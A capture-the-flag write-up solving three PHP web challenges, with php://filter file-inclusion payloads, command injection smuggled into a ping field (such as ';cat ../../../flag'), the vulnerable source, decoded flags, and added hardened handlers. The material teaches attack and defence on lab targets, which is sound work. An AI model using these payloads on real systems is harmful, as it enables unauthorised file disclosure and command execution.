[ACTF2020 Freshman Contest] Include

Original information

The information provided by the challenge is:

http://xxx.xxx.xxx:xxx?file=flag.php
A pseudo-protocol (PHP stream wrapper) vulnerability

Solution

// Pass a pseudo-protocol in the URL parameter and try to read a file
?file=php://filter/convert.base64-encode/resource=index.php

// The response is the following encoded data:
PG1ldGEgY2hhcnNldD0idXRmOCI+Cjw/cGhwCmVycm9yX3JlcG9ydGluZygwKTsKJGZpbGUgPSAkX0dFVFsiZmlsZSJdOwppZihzdHJpc3RyKCRmaWxlLCJwaHA6Ly9pbnB1dCIpIHx8IHN0cmlzdHIoJGZpbGUsInppcDovLyIpIHx8IHN0cmlzdHIoJGZpbGUsInBoYXI6Ly8iKSB8fCBzdHJpc3RyKCRmaWxlLCJkYXRhOiIpKXsKCWV4aXQoJ2hhY2tlciEnKTsKfQppZigkZmlsZSl7CglpbmNsdWRlKCRmaWxlKTsKfWVsc2V7CgllY2hvICc8YSBocmVmPSI/ZmlsZT1mbGFnLnBocCI+dGlwczwvYT4nOwp9Cj8+Cg==

Decoding it yields the source code:
echo base64_decode("PG1ldGEgY2hhcnNldD0idXRmOCI+Cjw/cGhwCmVycm9yX3JlcG9ydGluZygwKTsKJGZpbGUgPSAkX0dFVFsiZmlsZSJdOwppZihzdHJpc3RyKCRmaWxlLCJwaHA6Ly9pbnB1dCIpIHx8IHN0cmlzdHIoJGZpbGUsInppcDovLyIpIHx8IHN0cmlzdHIoJGZpbGUsInBoYXI6Ly8iKSB8fCBzdHJpc3RyKCRmaWxlLCJkYXRhOiIpKXsKCWV4aXQoJ2hhY2tlciEnKTsKfQppZigkZmlsZSl7CglpbmNsdWRlKCRmaWxlKTsKfWVsc2V7CgllY2hvICc8YSBocmVmPSI/ZmlsZT1mbGFnLnBocCI+dGlwczwvYT4nOwp9Cj8+Cg==");

(Source)
<meta charset="utf8">
<?php
error_reporting(0);
$file = $_GET["file"];
if(stristr($file,"php://input") || stristr($file,"zip://") || stristr($file,"phar://") || stristr($file,"data:")){
    exit('hacker!');
}
if($file){
    include($file);
}else{
    echo '<a href="?file=flag.php">tips</a>';
}
?>

Core code analysis

$file = $_GET["file"];
# Blocked pseudo-protocols
if(stristr($file,"php://input") || stristr($file,"zip://") || stristr($file,"phar://") || stristr($file,"data:")){
    exit('hacker!');
}

# File inclusion
if($file){
    include($file);
}else{
    echo '<a href="?file=flag.php">tips</a>';
}

The parameter and the functions are easy to follow; the question is how to write the pseudo-protocol payload.

Some of the pseudo-protocols (PHP stream wrappers) and what they do:
phar:// — PHP archives
file:// — access the local filesystem
http:// — access HTTP(s) URLs
ftp:// — access FTP(s) URLs
php:// — access the various input/output streams (I/O streams)
zlib:// — compression streams
data:// — data (RFC 2397)
glob:// — find pathnames matching a pattern
ssh2:// — Secure Shell 2
rar:// — RAR
ogg:// — audio streams
expect:// — process interactive streams

Source: https://blog.csdn.net/qq_53142368/article/details/116594299

The page we first visited has a flag.php; when accessed directly it is executed as PHP code, so let's try to read it out instead.

payload:
Read the flag file:
http://ab5d369b-1004-496f-a36f-c064b146234c.node4.buuoj.cn:81?file=php://filter/convert.base64-encode/resource=flag.php
Base64-decode the data stream read from the flag file:
echo base64_decode("PD9waHAKZWNobyAiQ2FuIHlvdSBmaW5kIG91dCB0aGUgZmxhZz8iOwovL2ZsYWd7MmIxZjc1NWYtYzhjNS00ZWRjLTg3OTUtMGU5NWNlMDZlMjE2fQo=");

<?php
echo "Can you find out the flag?";
//flag{2b1f755f-c8c5-4edc-8795-0e95ce06e216}
You read that right, this is the flag.
I did not expect it to be this simple either; it is probably meant to show us what pseudo-protocols are.

[ACTF2020 Freshman Contest] Exec

Original challenge information

A giveaway challenge; there is only one piece of original information:

A ping input box: enter an IP address, and it pings it and returns the result.

Solution

Try pinging like this:
127.0.0.1;ls
This returns the directory listing:
index.php
Try dumping the file:
127.0.0.1 ;cat index.php
This yields the key code:
<?php
if (isset($_POST['target'])) {
    system("ping -c 3 ".$_POST['target']);
}
?>
Since there is no filtering at all, just browse the directories to find the flag.

payload:
url: http://944db2e2-a4b3-4a25-b013-30417e6e64ff.node4.buuoj.cn:81/
POST parameter: target=127.0.0.1;cat ../../../flag
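The write-up's ping handler is vulnerable because the POST value is concatenated straight into the shell command. The following is an added example (not the challenge's own code) that places that handler next to a hardened version; the function names and the constructed sample inputs are my own.

```php
<?php
// Added example (not the challenge's code): the vulnerable ping handler from
// the write-up next to a hardened version. Function names are my own.

// Vulnerable, as on the page: the POST value is concatenated into the shell
// command, so a value such as "127.0.0.1;cat index.php" runs a second command.
function ping_vulnerable(string $target): void
{
    system("ping -c 3 " . $target);
}

// Hardened, step 1: accept only a literal IPv4/IPv6 address. Anything else
// (hostnames, shell metacharacters, spaces) is rejected before any command runs.
function validate_ping_target(string $target): ?string
{
    $target = trim($target);
    if (filter_var($target, FILTER_VALIDATE_IP) === false) {
        return null;
    }
    return $target;
}

// Hardened, step 2: even the validated value goes through escapeshellarg()
// as defence in depth, and the command itself is a fixed string.
function ping_hardened(string $target): string
{
    $ip = validate_ping_target($target);
    if ($ip === null) {
        return "invalid target\n";
    }
    $out = shell_exec('ping -c 3 ' . escapeshellarg($ip));
    return is_string($out) ? $out : "ping failed\n";
}

// Constructed inputs: the two injection attempts mirror the write-up's payloads.
$samples = ['127.0.0.1', '::1', '127.0.0.1;cat index.php', '127.0.0.1;cat ../../../flag'];
foreach ($samples as $s) {
    $verdict = validate_ping_target($s) === null ? 'rejected' : 'accepted';
    echo str_pad($s, 30) . ' => ' . $verdict . "\n";
}
```

Only the two plain IP literals pass validation; the handler should also be the only place the value reaches a shell, so a blocklist of characters such as ";" is not needed and would be easy to get wrong.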

[Geek Challenge 2019] Secret File

Original information

Capturing the traffic in Burp revealed a hint pointing to a PHP file; opening it shows the key source code.

URL:
http://2c82657e-e201-4348-b33d-47abac2a24ec.node4.buuoj.cn:81/secr3t.php

Source obtained:
<html>
<title>secret</title>
<meta charset="UTF-8">
<?php
highlight_file(__FILE__);
error_reporting(0);
$file=$_GET['file'];
if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
    echo "Oh no!";
    exit();
}
include($file);
// the flag is in flag.php
?>
</html>

Solution

Core source:

$file=$_GET['file'];
if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
    echo "Oh no!";
    exit();
}
include($file);

Source analysis

$file=$_GET['file'];
# Block certain pseudo-protocols
if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
    echo "Oh no!";
    exit();
}
# File inclusion, reachable via a pseudo-protocol
include($file);

This is exactly the same as the Include challenge above; let's try it:

payload:
URL: http://2c82657e-e201-4348-b33d-47abac2a24ec.node4.buuoj.cn:81/secr3t.php?file=php://filter/convert.base64-encode/resource=flag.php
Base64-decode the data that was returned:
$a = 'PCFET0NUWVBFIGh0bWw+Cgo8aHRtbD4KCiAgICA8aGVhZD4KICAgICAgICA8bWV0YSBjaGFyc2V0PSJ1dGYtOCI+CiAgICAgICAgPHRpdGxlPkZMQUc8L3RpdGxlPgogICAgPC9oZWFkPgoKICAgIDxib2R5IHN0eWxlPSJiYWNrZ3JvdW5kLWNvbG9yOmJsYWNrOyI+PGJyPjxicj48YnI+PGJyPjxicj48YnI+CiAgICAgICAgCiAgICAgICAgPGgxIHN0eWxlPSJmb250LWZhbWlseTp2ZXJkYW5hO2NvbG9yOnJlZDt0ZXh0LWFsaWduOmNlbnRlcjsiPuWViuWTiO+8geS9oOaJvuWIsOaIkeS6hu+8geWPr+aYr+S9oOeci+S4jeWIsOaIkVFBUX5+fjwvaDE+PGJyPjxicj48YnI+CiAgICAgICAgCiAgICAgICAgPHAgc3R5bGU9ImZvbnQtZmFtaWx5OmFyaWFsO2NvbG9yOnJlZDtmb250LXNpemU6MjBweDt0ZXh0LWFsaWduOmNlbnRlcjsiPgogICAgICAgICAgICA8P3BocAogICAgICAgICAgICAgICAgZWNobyAi5oiR5bCx5Zyo6L+Z6YeMIjsKICAgICAgICAgICAgICAgICRmbGFnID0gJ2ZsYWd7Y2IyNzU4NDAtMjFlNC00OWJkLThhOWItNmVjODQ1NWFiZTdifSc7CiAgICAgICAgICAgICAgICAkc2VjcmV0ID0gJ2ppQW5nX0x1eXVhbl93NG50c19hX2cxcklmcmkzbmQnCiAgICAgICAgICAgID8+CiAgICAgICAgPC9wPgogICAgPC9ib2R5PgoKPC9odG1sPgo= ';
echo(base64_decode($a));

Source:
<!DOCTYPE html>
<html>
    <head>
        <meta charset="utf-8">
        <title>FLAG</title>
    </head>
    <body style="background-color:black;"><br><br><br><br><br><br>
        <h1 style="font-family:verdana;color:red;text-align:center;">啊哈!你找到我了!可是你看不到我QAQ~~~</h1><br><br><br>
        <p style="font-family:arial;color:red;font-size:20px;text-align:center;">
            <?php
                echo "我就在这里";
                $flag = 'flag{cb275840-21e4-49bd-8a9b-6ec8455abe7b}';
                $secret = 'jiAng_Luyuan_w4nts_a_g1rIfri3nd'
            ?>
        </p>
    </body>
</html>
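Both the Include challenge and Secret File guard include() with a blocklist of wrapper names, and both are defeated by the same php://filter payload. The following is an added example (not the challenges' own code) that reduces the two blocklists to predicates and then shows the allowlist pattern that removes the problem; the function names and the PAGES table are my own assumptions.

```php
<?php
// Added example (not the challenges' code): the two blocklists from Include and
// Secret File reduced to predicates, and an allowlist-based include to replace
// them. Function names and the PAGES table are my own assumptions.

function blocked_by_include_challenge(string $file): bool
{
    return stristr($file, "php://input") !== false || stristr($file, "zip://") !== false
        || stristr($file, "phar://") !== false || stristr($file, "data:") !== false;
}

function blocked_by_secret_file_challenge(string $file): bool
{
    return strstr($file, "../") !== false || stristr($file, "tp") !== false
        || stristr($file, "input") !== false || stristr($file, "data") !== false;
}

// Neither list names php://filter, so the source-disclosure payload used in the
// write-up is not caught by either check.
$payload = 'php://filter/convert.base64-encode/resource=flag.php';
var_dump(blocked_by_include_challenge($payload), blocked_by_secret_file_challenge($payload));

// Hardened: the request carries a page key, never a path or URL. The key is looked
// up in a fixed table, and the resolved file must still lie inside $base.
const PAGES = ['home' => 'index.php', 'about' => 'about.php'];   // assumed pages

function resolve_include(string $key, string $base): ?string
{
    if (!isset(PAGES[$key])) {
        return null;                                   // unknown key: include nothing
    }
    $baseReal = realpath($base);
    $real = realpath($base . DIRECTORY_SEPARATOR . PAGES[$key]);
    if ($baseReal === false || $real === false
        || strpos($real, $baseReal . DIRECTORY_SEPARATOR) !== 0) {
        return null;                                   // missing file or outside $base
    }
    return $real;
}

$target = resolve_include($_GET['page'] ?? 'home', __DIR__ . '/pages');
if ($target === null) {
    http_response_code(404);
    exit('not found');
}
include $target;
```

Both predicates return false for the php://filter payload, which is exactly the gap the write-up uses; with the allowlist the user-controlled value is never used as a path or stream target, so no wrapper list has to be maintained at all.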